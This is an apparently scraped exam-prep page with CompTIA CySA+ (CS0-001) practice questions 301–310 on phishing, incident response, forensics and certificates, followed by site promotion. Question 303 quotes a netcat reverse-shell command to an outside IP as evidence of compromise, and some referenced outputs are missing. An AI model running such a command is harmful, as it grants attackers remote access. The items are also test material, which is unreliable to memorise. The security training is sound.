CS0-001 Exam Details

  • Exam Code
    :CS0-001
  • Exam Name
    :CompTIA Cybersecurity Analyst (CySA+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :416 Q&As
  • Last Updated
    :Feb 05, 2022

CompTIA CS0-001 Online Questions & Answers

  • Question 301:

    A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior?

    A. Phishing
    B. Whaling
    C. Spam
    D. Ransomware

  • Question 302:

    A security analyst's company uses RADIUS to support a remote sales staff of more than 700 people. The Chief Information Security Officer (CISO) asked to have IPSec using ESP and 3DES enabled to ensure the confidentiality of the communication as per RFC 3162. After the implementation was complete, many sales users reported latency issues and other performance issues when attempting to connect remotely. Which of the following is occurring?

    A. The device running RADIUS lacks sufficient RAM and processing power to handle ESP implementation.
    B. RFC 3162 is known to cause significant performance problems.
    C. The IPSec implementation has significantly increased the amount of bandwidth needed.
    D. The implementation should have used AES instead of 3DES.

  • Question 303:

    A security analyst is investigating the possible compromise of a production server for the company's public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

    In some of the portal's startup command files, the following command appears: nc 璷 /bin/sh 72.14.1.36 4444 Investigating further, the analyst runs Netstat and obtains the following output

    Which of the following is the best step for the analyst to take NEXT?

    A. Initiate the security incident response process
    B. Recommend training to avoid mistakes in production command files
    C. Delete the unknown files from the production servers
    D. Patch a new vulnerability that has been discovered
    E. Manually review the robots .txt file for errors

  • Question 304:

    After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to resolve a user navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowing inappropriate access to sensitive data and reports. Which of the following could have prevented this code from being released into the production environment?

    A. Cross training
    B. Succession planning
    C. Automated reporting
    D. Separation of duties

  • Question 305:

    A security analyst received a compromised workstation. The workstation's hard drive may contain evidence of criminal activities. Which of the following is the FIRST thing the analyst must do to ensure the integrity of the hard drive while performing the analysis?

    A. Make a copy of the hard drive.
    B. Use write blockers.
    C. Run rm –R command to create a hash.
    D. Install it on a different machine and explore the content.

  • Question 306:

    A cybersecurity analyst is reviewing Apache logs on a web server and finds that some logs are missing. The analyst has identified that the systems administrator accidentally deleted some log files. Which of the following actions or rules should be implemented to prevent this incident from reoccurring?

    A. Personnel training
    B. Separation of duties
    C. Mandatory vacation
    D. Backup server

  • Question 307:

    An analyst is observing unusual network traffic from a workstation. The workstation is communicating with a known malicious site over an encrypted tunnel. A full antivirus scan with an updated antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation?

    A. Zero-day attack
    B. Known malware attack
    C. Session hijack
    D. Cookie stealing

  • Question 308:

    A security analyst is running a routine vulnerability scan against a web farm. The farm consists of a single server acting as a load-balancing reverse proxy and offloads cryptographic processes to the backend servers. The backend servers

    consist of four servers that process the inquiries for the front end.

    A web service SSL query of each server responds with the same output:

    Connected (0x000003) depth=0 /0=farm.company.com/CN=farm.company.com/OU=Domain Control Validated Which of the following results BEST addresses these findings?

    A. Advise the application development team that the SSL certificates on the backend servers should be revoked and reissued to match their hostnames
    B. Notify the application development team of the findings and advise management of the results
    C. Create an exception in the vulnerability scanner, as the results and false positives and can be ignored safely
    D. Require that the application development team renews the farm certificate and includes a wildcard for the `local' domain in the certificate SAN field

  • Question 309:

    A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops. Which of the following tools would be appropriate to use in this case?

    A. MSBA
    B. SHA1sum
    C. FIM
    D. DLP

  • Question 310:

    A company office was broken into over the weekend. The office manager contacts the IT security group to provide details on which servers were stolen. The security analyst determines one of the stolen servers contained a list of customer PII information, and another server contained a copy of the credit card transactions processed on the Friday before the break-in. In addition to potential security implications of information that could be gleaned from those servers and the rebuilding/restoring of the data on the stolen systems, the analyst needs to determine any communication or notification requirements with respect to the incident. Which of the following items is MOST important when determining what information needs to be provided, who should be contacted, and when the communication needs to occur.

    A. Total number of records stolen
    B. Government and industry regulations
    C. Impact on the reputation of the company's name/brand
    D. Monetary value of data stolen

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CS0-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.